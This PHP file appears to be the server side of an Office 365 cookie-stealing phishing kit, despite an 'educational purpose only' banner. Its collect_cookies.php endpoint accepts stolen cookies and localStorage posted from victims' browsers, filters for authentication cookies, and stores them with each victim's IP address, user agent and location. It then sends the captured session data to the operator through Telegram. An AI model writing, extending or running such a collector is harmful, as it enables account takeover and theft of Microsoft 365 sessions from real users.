<?php
// ===================================================
// EDUCATIONAL PURPOSE ONLY - SECURITY TESTING
// ===================================================

require_once 'config.php';

// Function to extract Office 365 authentication cookies
function extractOffice365Cookies($cookies_json) {
    global $config;
    $critical_cookies = [];
    
    // Try to decode JSON
    $all_cookies = json_decode($cookies_json, true);
    
    if (!$all_cookies) {
        // If not JSON, try parsing cookie string
        $cookies = explode(';', $cookies_json);
        $all_cookies = [];
        
        foreach ($cookies as $cookie) {
            $parts = explode('=', trim($cookie), 2);
            if (count($parts) == 2) {
                $all_cookies[$parts[0]] = $parts[1];
            }
        }
    }
    
    // Extract critical cookies
    foreach ($all_cookies as $cookie_name => $cookie_value) {
        if (in_array($cookie_name, $config['auth_cookies'])) {
            $critical_cookies[$cookie_name] = $cookie_value;
        }
    }
    
    return $critical_cookies;
}

// Function to extract cookies from headers
function extractCookiesFromHeaders($headers) {
    global $config;
    $auth_cookies = [];
    $cookie_headers = [];
    
    // Find all Set-Cookie headers
    foreach ($headers as $header) {
        if (stripos($header, 'Set-Cookie:') === 0) {
            $cookie_headers[] = $header;
        }
    }
    
    // Extract authentication cookies
    foreach ($cookie_headers as $header) {
        foreach ($config['auth_cookies'] as $cookie_name) {
            if (strpos($header, $cookie_name . '=') !== false) {
                // Extract cookie name and value
                preg_match('/Set-Cookie: ([^=]+)=([^;]+)/', $header, $matches);
                if (count($matches) === 3) {
                    $auth_cookies[$matches[1]] = $matches[2];
                }
            }
        }
    }
    
    return $auth_cookies;
}

// Function to handle cookie collection endpoint
function handleCookieCollection() {
    global $config;
    
    // Get the raw POST data
    $json_data = file_get_contents('php://input');
    $data = json_decode($json_data, true);
    
    if (!$data || (!isset($data['cookies']) && !isset($data['localStorage']))) {
        http_response_code(400);
        echo json_encode(['error' => 'Invalid data']);
        exit;
    }
    
    // Extract cookies
    $cookies = isset($data['cookies']) ? $data['cookies'] : '';
    $localStorage = isset($data['localStorage']) ? $data['localStorage'] : [];
    
    // Extract authentication cookies
    $auth_cookies = extractOffice365Cookies($cookies);
    
    // Save data if we have cookies or localStorage
    if (!empty($auth_cookies) || !empty($localStorage)) {
        $timestamp = time();
        $filename = $config['cookies_dir'] . '/' . $timestamp . '_' . md5($json_data) . '.json';
        
        $save_data = [
            'timestamp' => date('Y-m-d H:i:s', $timestamp),
            'ip_address' => getClientIP(),
            'user_agent' => $_SERVER['HTTP_USER_AGENT'],
            'auth_cookies' => $auth_cookies,
            'localStorage' => $localStorage,
            'location' => getClientLocation(getClientIP())
        ];
        
        file_put_contents($filename, json_encode($save_data, JSON_PRETTY_PRINT));
        
        // Send notification
        $message = "🍪 **Office365 Session Data Captured**\n\n";
        $message .= "🌐 **IP:** `" . getClientIP() . "`\n";
        $message .= "⏰ **Timestamp:** " . date('Y-m-d H:i:s', $timestamp) . "\n\n";
        
        if (!empty($auth_cookies)) {
            $message .= "**Authentication Cookies:**\n";
            foreach ($auth_cookies as $name => $value) {
                $message .= "• `$name`: " . substr($value, 0, 20) . "...\n";
            }
            $message .= "\n";
        }
        
        if (!empty($localStorage)) {
            $message .= "**LocalStorage Items:** " . count($localStorage) . " items captured\n";
        }
        
        sendTelegramNotification($message);
        
        // Return success
        http_response_code(200);
        echo json_encode(['status' => 'success', 'message' => 'Data received']);
    } else {
        // No useful data
        http_response_code(204);
        echo json_encode(['status' => 'no_data', 'message' => 'No useful data found']);
    }
    
    exit;
}

// Create a collector endpoint
if (basename($_SERVER['SCRIPT_NAME']) == 'collect_cookies.php') {
    handleCookieCollection();
}
?>
